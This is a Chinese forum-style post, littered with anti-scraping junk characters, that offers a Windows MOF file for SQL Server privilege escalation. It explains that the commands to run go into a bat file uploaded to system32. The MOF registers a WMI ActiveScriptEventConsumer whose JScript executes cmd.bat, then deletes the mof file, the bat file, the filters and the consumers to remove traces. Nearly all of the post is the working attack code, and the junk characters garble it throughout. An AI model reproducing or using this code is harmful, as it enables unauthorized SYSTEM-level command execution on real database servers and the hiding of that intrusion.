这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 `0 T3 D( q4 a( E需要将要运行的命令写入到bat上传到system32目录,然后执行。# m% i- |0 _) z) T! `: m: W% \) t
$ u/ e' {* S+ I% ?9 [这个sql提权MOF需要运行 system下的文件,不能定义路径。3 ?9 n* V( Q" s( d
需要将要运行的命令写入到bat上传到system32目录,然后执行。
& Z& I+ H+ t2 P& h7 }
9 D0 N) N# W' B, I$ e6 g n#pragma
5 v: p2 B2 |; e- A7 L2 o namespace("\\\\.\\root\\cimv2")
4 g% B1 H# O: s0 t, \# n class
/ t2 B1 L0 R: D$ U2 \8 V5 D; ^: a MyClass547) Z1 h3 D" A. j% @6 _( p+ N
{ [key]7 V2 W2 l: k5 m# S
string4 H+ v) S1 w$ N0 M" |- \
Name;
/ k2 g! \( p. h5 p };
/ m- o# k2 s4 E/ v; D* G' b class0 B! t# ~/ W/ a% ~8 ]1 w6 W
ActiveScriptEventConsumer" R, F, T, A/ y( L4 N8 V
: __EventConsumer { [key]
! @( R3 d" L4 g' I6 R string
! _% ?/ M- n( d) `5 o Name; [not_null]- R2 t4 h5 e# {3 T
string
7 c E+ N U- F- Q" w c* t0 s2 e" ~+ W1 @ ScriptingEngine; string
- A5 ?% L- s3 `4 @# H; | o ScriptFileName; [template]
7 y v0 @/ ~3 `( {+ x I v string
5 B) N$ w' ?6 z6 @ ScriptText; uint32 KillTimeout;; `8 A8 {4 [8 X, m+ ?
}; instance of __Win32Provider as $P {0 E, ^6 E: ]* z! R. t- x
Name2 X1 h7 M, E8 f! b- B& x: Y! y
=
7 ?. m* P T. b0 t5 {0 w. @ "ActiveScriptEventConsumer"; CLSID =
0 ~9 P% m. O: J" @3 I "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
$ a* ?1 z. X, a) g _# } PerUserInitialization
6 Y9 H& ]4 z5 b = TRUE;" B- k7 o$ G' @% p: R3 X) g: ^9 ]
}; instance of __EventConsumerProviderRegistration { Provider+ ~2 r. E3 ^4 M' G$ n
= $P; ConsumerClassNames
& R* Q; i# z$ ^! t7 p% ^2 T =$ X5 h' N! r0 h/ U! ?0 T$ {
{"ActiveScriptEventConsumer"};5 \% }$ {/ T+ l
};6 w/ d. R2 }6 v0 w
Instance of ActiveScriptEventConsumer, [" w$ q" c+ z; w' t* b6 P, \6 i
as $cons { Name3 O9 S) m3 ]9 k& ^% |$ n
=
8 v/ U; Z5 g/ J% o1 s8 H "ASEC"; ScriptingEngine
9 }# f( Q5 P+ O1 `* [ =9 A- _$ t3 d; a
"JScript"; ScriptText
( I. r9 B% x1 f =) c' Z4 {$ F3 H8 M/ F
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
9 |8 |2 l P. f6 H+ m Instance of ActiveScriptEventConsumer' \8 Y% J0 J- d0 S& W
as $cons2 { Name
" j `4 X1 L+ b! q2 z =
$ E+ }) k" f8 o( z% S "qndASEC"; ScriptingEngine1 j* H" O6 z) d& w
=
) K1 ?: T/ M) S6 q# ^+ g* D "JScript"; ScriptText% ] C w/ {- Y8 k& U0 }# f9 @
=6 U- B1 r! e# v9 B3 ~- |, e
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";: N9 }, N8 b0 d
}; instance of __EventFilter as $Filt { Name" T% v" o7 f4 w. N! H
=! V0 z! v, k" |2 p- R8 C& o ?
"instfilt"; Query) k8 Y3 A) ?9 t, U
=
9 L' y& D: t a( k9 z; L "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage5 j# H' X! b5 K
=# U( g0 D) E. v9 |) _
"WQL"; }; instance of __EventFilter as $Filt2 { Name+ T y8 O) `4 ~. ^
=
8 T& A* v/ I- X, d5 p& L+ } "qndfilt"; Query
( V4 w0 r# g5 m2 [ =
0 I# R, F! g% Z2 W0 A/ p "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage6 y8 o% j o0 W
=
% O& t' q8 M/ T% N0 C3 Z0 Y "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
0 [/ Q" E' J- c d = $cons; Filter7 ~6 |0 [2 y u1 P! X5 N
= $Filt;
8 f X5 M2 k0 E* G8 R1 Q5 K0 ^ }; instance of __FilterToConsumerBinding as $bind2 { Consumer
1 x1 C% L" ~# h% v0 R; Q2 u8 K, R = $cons2; Filter
& o: F$ `1 @- ~ = $Filt2;. c4 {2 _1 j# f7 d+ _( D! |
}; instance of MyClass547, ~ P: o6 [% N3 z/ t
as $MyClass { Name3 Z/ C, L3 ~& K% E5 p
=
2 r5 D- q3 c4 x9 a+ N "ClassConsumer";
4 u6 v0 g' E: A1 y) ~* g$ j& F }; |